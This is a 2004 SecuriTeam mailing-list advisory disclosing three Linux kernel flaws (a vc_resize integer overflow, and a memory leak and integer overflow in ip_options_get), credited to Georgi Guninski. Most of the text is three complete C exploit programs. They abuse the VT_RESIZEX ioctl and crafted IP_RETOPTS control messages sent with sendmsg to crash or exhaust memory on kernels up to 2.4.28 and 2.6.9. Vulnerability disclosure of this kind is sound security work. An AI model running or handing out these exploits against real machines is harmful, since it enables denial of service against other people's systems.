Date: 16 Dec 2004 11:31:06 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [EXPL] Linux Kernel Multiple Local DoS (vc_resize, ip_options_get)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Linux Kernel Multiple Local DoS (vc_resize, ip_options_get)
------------------------------------------------------------------------
SUMMARY
Three vulnerabilities have been found in the Linux Kernel, an integer
overflow in the vc_resize function, a memory leak in ip_options_get and an
integer overflow in ip_options_get. The vulnerabilities can at the very
least be used to cause a denial of service, in one case you can use it to
reveal arbitrary segments of the memory.
DETAILS
Vulnerable Systems:
* Linux kernel version 2.6 up to 2.6.9 (inclusive)
* Linux kernel version 2.4 up to 2.4.28 (inclusive)
Exploit (vc_resize):
/* vc_resize int overflow
* Copyright Georgi Guninski
* Cannot be used in vulnerability databases
* */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/vt.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>
int main(int ac, char **av)
{
int fd;
struct vt_consize vv;
int cou=4242;
fd=open("/dev/tty",O_RDWR);
if (fd<0) {perror("open");return -42;}
memset(&vv,0,sizeof(vv));
vv.v_clin=0;
vv.v_vcol=0;
vv.v_ccol=0;
/* magic values, overflow on i386*/
vv.v_rows=65535;
vv.v_cols=32769;
system("sync");
if (ioctl(fd,VT_RESIZEX,&vv) < 0) {perror("ioctl");return -4242;}
while(cou--) printf(";)\n");
close(fd);
return 42;
}
Exploit (ip_options_get):
/* memory leak
* Copyright Georgi Guninski
* Cannot be used in vulnerability databases (like securityfocus and
mitre)
* */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(int ac,char **av)
{
struct msghdr msghdr;
struct iovec iovector[10];
int i,s,j,ma;
struct sockaddr_in sockad;
char msg[128];
struct cmsghdr *cmsg,*cm2;
char opts[24];
ma=250;
printf("just wait and watch memory usage\n");
memset(opts,0,sizeof(opts));
while(42)
{
s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);
sockad.sin_family = AF_INET;
sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
sockad.sin_port=htons(8080);
connect(s,(struct sockaddr *) &sockad, sizeof(sockad));
memset(msg,'v',sizeof(msg));
#define VV (ma*(sizeof(struct cmsghdr)+sizeof(opts))+1024*1024)
cmsg = malloc(VV);
memset(cmsg,0,VV);
cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cmsg->cmsg_level = SOL_IP;
cmsg->cmsg_type = IP_RETOPTS;
memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
for(j=0;j<ma;j++)
{
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cm2)+sizeof(opts));
}
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = sizeof(struct cmsghdr) + 8;
msghdr.msg_name = &sockad;
msghdr.msg_namelen = sizeof(sockad);
msghdr.msg_control=cmsg;
msghdr.msg_controllen= cmsg->cmsg_len + (j)*cmsg->cmsg_len+cm2->cmsg_len;
msghdr.msg_iov = iovector;
msghdr.msg_iovlen = 1;
iovector[0].iov_base = msg;
iovector[0].iov_len = sizeof(msg);
if ((i = sendmsg(s, &msghdr, 0)) < 0)
{perror("sendmsg");return -42;}
close(s);
free(cmsg);
}
return 42;
}
/* int overflow in ip_options_get
* Copyright Georgi Guninski
* Cannot be used in vulnerability databases (like securityfocus and
mitre)
* */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(int ac,char **av)
{
struct msghdr msghdr;
struct iovec iovector[10];
int i,s;
struct sockaddr_in sockad;
char msg[128];
struct cmsghdr *cmsg,*cm2;
char opts[12];
s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);
sockad.sin_family = AF_INET;
sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
sockad.sin_port=htons(8080);
connect(s,(struct sockaddr *) &sockad, sizeof(sockad));
memset(msg,'v',sizeof(msg));
memset(opts,0,sizeof(opts));
#define VV 1024*1024
cmsg = malloc(VV);
memset(cmsg,0,VV);
cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cmsg->cmsg_level = SOL_IP;
cmsg->cmsg_type = IP_RETOPTS;
memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = -1;
msghdr.msg_name = &sockad;
msghdr.msg_namelen = sizeof(sockad);
msghdr.msg_control=cmsg;
msghdr.msg_controllen= cmsg->cmsg_len + 420;
msghdr.msg_iov = iovector;
msghdr.msg_iovlen = 1;
iovector[0].iov_base = msg;
iovector[0].iov_len = sizeof(msg);
system("sync");
if ((i = sendmsg(s, &msghdr, 0)) < 0)
perror("sendmsg");
return 42;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:guninski@guninski.com.>
Georgi Guninski.
The original article can be found at:
<http://www.guninski.com/where_do_you_want_billg_to_go_today_2.html>
http://www.guninski.com/where_do_you_want_billg_to_go_today_2.html
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.